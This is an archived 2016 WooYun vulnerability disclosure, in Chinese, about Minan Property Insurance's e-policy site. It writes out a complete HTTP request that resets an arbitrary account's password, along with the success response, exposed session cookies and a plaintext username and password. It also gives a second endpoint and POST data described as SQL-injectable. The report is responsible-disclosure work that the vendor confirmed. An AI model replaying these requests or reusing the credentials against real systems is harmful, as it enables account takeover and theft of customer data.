当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167128

漏洞标题:民安财产某处存在漏洞任意修改帐号涉及大量敏感数据

相关厂商:民安财产保险有限公司

漏洞作者: 八神

提交时间:2016-01-04 09:24

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:账户体系控制不严

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-04: 细节已通知厂商并且等待厂商处理中
2016-01-05: 厂商已经确认,细节仅向厂商公开
2016-01-15: 细节向核心白帽子及相关领域专家公开
2016-01-25: 细节向普通白帽子公开
2016-02-04: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

隔壁的老王偷了我的iPhone 能不能送个。

详细说明:

POst修改密码

POST /changePassword.do HTTP/1.1
Host: e-policy.minanins.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://e-policy.minanins.com/changePassword.do
Cookie: JSESSIONID=E5AD4149368A120747836AF19FA36ABB; BIGipServeryijianxian_web_pool=537004716.16671.0000; CNZZDATA1000420699=641673830-1451845093-http%253A%252F%252Fwww.minanins.com%252F%7C1451845093; ec_username=MA000001; ec_password=epolicy123; pgv_pvid=9813965397
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
usercode=MA000001&newPassword1=epolicy123&newPassword2=epolicy123


<link href="/css/admin.css" rel="stylesheet" type="text/css"/>
<link href="/css/theme.css" rel="stylesheet" type="text/css"/>
<link type="text/css" href="/css/jquery-ui-1.7.1.custom.css" rel="stylesheet" />
<script language="javascript" src="/js/calendar.js"></script>
<script>
function IsDate(mystring)
{
var reg = /^(\d{4})-(\d{2})-(\d{2})$/;
var str = mystring;
var arr = reg.exec(str);
if(!reg.test(str)&&RegExp.$2<=12&&RegExp.$3<=31)
{
return false;
}
else
{
return true;
}
}
</script>
<head>
<title>信息提示</title>
</head>
<body>
<table width="100%" class="pn-ftable" cellpadding="2" cellspacing="1" border="0">
<tr>
<td background="images/title_bg1.jpg" colspan="4">信息提示</td></tr>
</table>
<table width="100%" class="pn-ftable" cellpadding="2" cellspacing="1" border="0">
<tr>
<td class="pn-fbutton" align="center">密码修改成功</td>
</tr>

<tr>
<td class="pn-fbutton" align="center"></td>
</tr>
</table>


再送一条注入地址POST sql注入漏洞
http://e-policy.minanins.com/initInsertPersonOnlineWebservices.do
POST数据:
userCode=MA000173&password=98AEA0E1DA79C67BB6D66A564EC015FF&riskPlanCode=1158008

漏洞证明:

1.png


2.png


3.png


4.png


5.png


6.png


7.png


8.png


9.png


10.png

修复方案:

哎 一直没有手机用。

版权声明:转载请注明来源 八神@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-05 09:22

厂商回复:

谢谢

最新状态:

暂无